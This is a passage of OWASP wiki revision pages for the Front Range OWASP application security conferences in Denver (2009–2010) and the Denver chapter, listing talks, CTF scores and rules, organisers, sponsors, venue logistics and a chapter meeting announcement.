| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
Final scores:<br />
{|<br />
|Rank||Name||Score||Comments<br />
|-<br />
'''|1||mantis||4500||<br />
|-<br />
|2||Mathew Rowley||2850||(wuntee)<br />
|-<br />
|3||jgimer||2300||<br />
|-'''<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84303Front Range OWASP Conference 20102010-06-02T15:34:05Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
[http://froc2010.eventbrite.com/ Registration is NOW OPEN]<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
[http://froc2010.eventbrite.com Registration is now open!]<br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
Click [http://froc2010.eventbrite.com HERE] to register now.<br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
This year FROC will again be hosting a capture the flag game / contest throughout the day.<br />
<br />
ctf.technowarfare.com<br />
<br />
Must use aurariacampus SSID to get in.<br />
<br />
<br />
If you need help with the CTF please contact eduprey at owasp dot org. <br />
<br />
<br />
<!-- CTF is OPEN!<br />
<br />
If you are attending FROC, join WiFi network "Auraria Campus" and browse to [http://ctf.technowarfare.com the CTF main page]. If you need help, email edupreyATowasp.org or visit the CTF lounge upstairs from the vendor area.<br />
<br />
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. <br />
<br />
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called "flags".) Enter a flag into the scoreboard and you're credited with the point value for that challenge.<br />
<br />
An entrant can be a team or an individual. Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights. Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.<br />
<br />
Thanks to:<br />
<br />
*IBM for sponsoring this event and providing technical support.<br />
*Dan Guido and the rest of the team of students from Polytechnic University for developing the code the contest is based on. (this CTF is a modified version of the one they presented at OWASP NYC 2008)<br />
<br />
===CTF Rules===<br />
<br />
1. Don't attack other players. The contest is about finding and exploiting vulnerabilities in the applications provided. (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)<br />
<br />
2. Don't attack the infrastructure. Networks, routers, and the scoreboard are all off-limits as targets of attack.<br />
<br />
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.<br />
<br />
--><br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring this OWASP event, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
NOTE: Twitter integration is temporarily disabled, check back soon for updates!<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver&diff=60767Denver2009-05-14T15:39:47Z<p>Eduprey: /* Future Meetings */</p>
<hr />
<div>{{Chapter Template|chaptername=Denver|extra=Chapter leaders are [mailto:eduprey@gmail.com Eric Duprey] and [mailto:dcampbell@owasp.org David Campbell]. |mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-denver|emailarchives=http://lists.owasp.org/pipermail/owasp-denver}}<br />
<br />
==== Local News ====<br />
<paypal>Denver</paypal><br />
<hr><br />
== SnowFROC 2009 Survey ==<br />
Thanks to everybody who made SnowFROC 2009 a standing room only success!!<br />
<br />
Thanks to those of you who completed the Survey. [http://www.owasp.org/images/c/ce/SnowFROC_Survey_Results.pdf Survey results].<br />
<br />
Videos from the event are [[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|now online]].<br />
<br />
==Questions, Comments==<br />
Questions can be directed to <br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
<br />
== Mailing List ==<br />
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email<br />
<br />
==== Chapter Meetings ====<br />
<br />
We are still recovering from [[Front_Range_OWASP_Conference_2009|SnowFROC]]. Videos from SnowFROC are [[Front_Range_OWASP_Conference_2009#Agenda_and_Presentations:_5_March_2009|now online]]. Our next meeting is tentatively planned for Wednesday 20 May 2009. Watch this space for details.<br />
<br />
== Future Meetings == <br />
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb & and Daniel Weiske: Compliance and application security testing]]<br />
<br />
== Past Meetings ==<br />
<br />
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]<br />
<br />
[[Denver January 2009 meeting|January 2009: David Campbell & Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]<br />
<br />
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]<br />
<br />
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]<br />
<br />
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]<br />
<br />
[[Denver July 2008 meeting|July 2008: David Byrne & Eric Duprey: Grendel-Scan]]<br />
<br />
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]<br />
<br />
[[Denver May 2008 meeting|May 2008: David Campbell & Eric Duprey: XSS Attacks & Defenses]]<br />
<br />
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]<br />
<br />
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]<br />
<br />
[[Denver June 2007 meeting|June 2007]]<br />
<br />
[[Denver April 2007 meeting|April 2007]]<br />
<br />
[[Denver February 2007 meeting|February 2007]]<br />
<br />
[[Denver January 2007 meeting|January 2007]]<br />
<br />
[[Denver November 2006 meeting|November 2006]]<br />
<br />
==[[Related_Organizations|Local Organizations of Interest]]==<br />
<br />
==== Denver OWASP Chapter Leaders ====<br />
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org<br />
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org<br />
==Chapter Management Links==<br />
[[Pizza|Best pizza in Centennial]]<br />
__NOTOC__<br />
<headertabs/><br />
[[Category:Colorado]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Denver_May_2009_meeting&diff=60766Denver May 2009 meeting2009-05-14T15:38:05Z<p>Eduprey: New page: == Wednesday 20 May 2009, 6pm @ RPSC == === Topic: Compliance and application security testing === Presenters: Dr. Joseph McComb, CISSP, CISA, G7799, CHSS and Daniel Weiske, CISSP, CISA,...</p>
<hr />
<div>== Wednesday 20 May 2009, 6pm @ RPSC ==<br />
<br />
=== Topic: Compliance and application security testing ===<br />
<br />
Presenters: Dr. Joseph McComb, CISSP, CISA, G7799, CHSS and Daniel Weiske, CISSP, CISA, CAP, NSA-IAM<br />
<br />
Title: Compliance while under siege: justifying security spending for the holes in your defenses.<br />
<br />
Synopsis: This presentation will show how to integrate a compliance framework into application security testing to produce an effective mechanism for presenting risk. Regulations, including security breach notification legislation, HIPAA, FISMA and other regulations specify penalties for failing to safeguard specific types of information. This presentation will demonstrate how to weave regulatory frameworks into the application testing process and how to quantify risk based upon penalties and ease of exploitation. Using real world examples, the presenters will show how this methodology can be used to justify security testing as a necessary expenditure for a secure environment.<br />
<br />
=== Agenda ===<br />
* 6pm: Pizza & pop @ RPSC, courtesy of Corporate Sponsors [http://www.fishnetsecurity.com/ FishNet Security]<br />
* 6:30pm: Introduction and Chapter business<br />
* 6:45pm --> 8pm: Presentation<br />
<br />
<br />
<br />
